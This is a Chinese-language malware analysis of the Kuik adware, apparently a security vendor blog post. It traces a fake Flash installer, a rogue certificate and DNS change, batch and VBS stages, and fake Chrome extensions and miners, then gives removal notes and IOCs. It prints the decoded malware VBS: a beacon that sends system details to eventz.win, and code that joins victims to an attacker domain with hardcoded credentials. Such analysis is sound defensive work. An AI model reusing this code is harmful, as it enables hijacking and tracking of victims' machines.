某些惡意軟體雖然非常簡單，但一旦被感染上之後我們往往需要耗費很大的精力才能將其清除，尤其是當它們開始干擾你係統配置時。最近我們的安全研究團隊，就發現了這樣一款名為Kuik的惡意廣告軟體。攻擊者正試圖利用這種獨特的技術手法，將谷歌瀏覽器擴充套件程式和數字貨幣礦工應用推送給受害者。在本文中，我們將對該惡意廣告軟體做進一步的技術分析，以及為大家提供相關的移除說明。

技術說明

Stage 1 – 。NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

第一階段是使用。NET編寫的偽造Adobe Flash Player圖示的應用。這是典型的惡意捆綁，偽裝成Adobe Flash Player更新程式欺騙使用者安裝。

我們使用dotNet反編譯器（即dnSpy）開啟後發現，該專案的原始名稱為WWVaper。

它有三個內部資源：

證書（svr。crt）

一個合法的Flash（誘餌）

下一階段元件（upp。exe）

證書：

——-BEGIN CERTIFICATE——-MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoMDEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMGA1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEWEHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbDoPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4yvHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcHqp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eXN6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5tZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgBhvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcNAQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVmAC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ02zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=——-END CERTIFICATE——-

證書詳情：

證書指向yahoo。com的一個DNS名稱。但是，證書路徑無效：

。NET installer負責安裝惡意證書和其他元件。首先，它會列舉網路介面並將收集的IP新增到列表中：

然後，它將新的IP作為DNS（18。219。162。248）新增到收集的介面，並安裝自己的證書（svr。crt）：

Stage 2 – upp。exe

3a13b73f823f081bcdc57ea8cc3140ac

此應用是一個未被混淆過的installer bundle。在裡面，我們找到了一個cabinet檔案：

它包含要刪除的其他模組：

應用程式“install。exe”以“setup。bat”作為引數進行部署。

Stage 3 - 從cabinet中解壓縮元件

應用程式install。exe是基本的。它的唯一作用就是在提升模式（ elevated mode）下執行下一個程序。在下面，你可以看到它的main function：

指令碼setup。bat部署了另一個名為SqadU9FBEV。bat的元件：

它透過ping 127。0。0。1來延遲執行。然後，它會執行第二個被編碼的指令碼，併為其提供一個活動ID作為引數：

下一個元素被部署為一個編碼的VBS指令碼：

在解碼後（解碼器），我們可以清楚地看到該指令碼的內容：NYkjVVXepl。vbs。我們還看到了系統指紋和到伺服器的信標：

Set SystemSet = GetObject（“winmgmts：”）。InstancesOf （“Win32_OperatingSystem”）for each System in SystemSet winVer = System。CaptionnextFunction trackEvent（eventName， extraData） Set tracking = CreateObject（“MSXML2。XMLHTTP”） tracking。open “GET”， “http：//eventz。win：13463/trk？event=” & eventName & “&computer=” & UUID & “&windows-version=” & winVer & “&error=” & err。Number & “；” & err。Description & “；” & err。Source & “；” & extraData & “&campaign=qavriknzkk&channel=” & WScript。Arguments。Item（0）， False tracking。send err。clearEnd Function

其中有一個非常有意思的片段，就是將受感染的計算機新增到域中：

SET objNetwork = CREATEOBJECT（“WScript。Network”）strComputer = objNetwork。ComputerNameSET objComputer = GetObject（“winmgmts：” & “{impersonationLevel=Impersonate，authenticationLevel=Pkt}！\\” & strComputer & “\root\cimv2：Win32_ComputerSystem。Name=‘” & strComputer & “’”）ReturnValue = objComputer。JoinDomainOrWorkGroup（“kuikdelivery。com”， “4sdOwt7b7L1vAKR6U7”， “kuikdelivery。com\administrator”， “OU=” & WScript。Arguments。Item（0） & “，DC=kuikdelivery，DC=com”， JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE）If （ReturnValue 0） Or （err。number 0） Then trackEvent “join-domain-failed”， ReturnValue WScript。Quit 1Else trackEvent “join-domain-success”， Null WScript。Quit 0End IF

Payloads

該程式使用了一系列有效載荷，我們發現攻擊者尤其偏愛假冒Chrome瀏覽器擴充套件程式。此外，還有一些數字貨幣礦工正在服務：

移除

Malwarebytes使用者（版本為3。x）可以透過執行全面掃描從系統中移除此威脅，其中包括取消加入惡意域控制器，並將你的機器恢復到其原始狀態。

IOCs

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h［。］com/fljlngkbcebmlpdlojnndahifaocnipb。crxd-and-h［。］com/123。crxd-and-h［。］com/jpfhjoeaokamkacafjdjbjllgkfkakca。crxd-and-h［。］com/mmemdlochnielijcfpmgiffgkpehgimj。crxkuikdelivery［。］com/emhifpfmcmoghejbfcbnknjjpifkmddc。crxtripan［。］me/kdobijehckphahlmkohehaciojbpmdbp。crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B75133D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB7359685012687889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712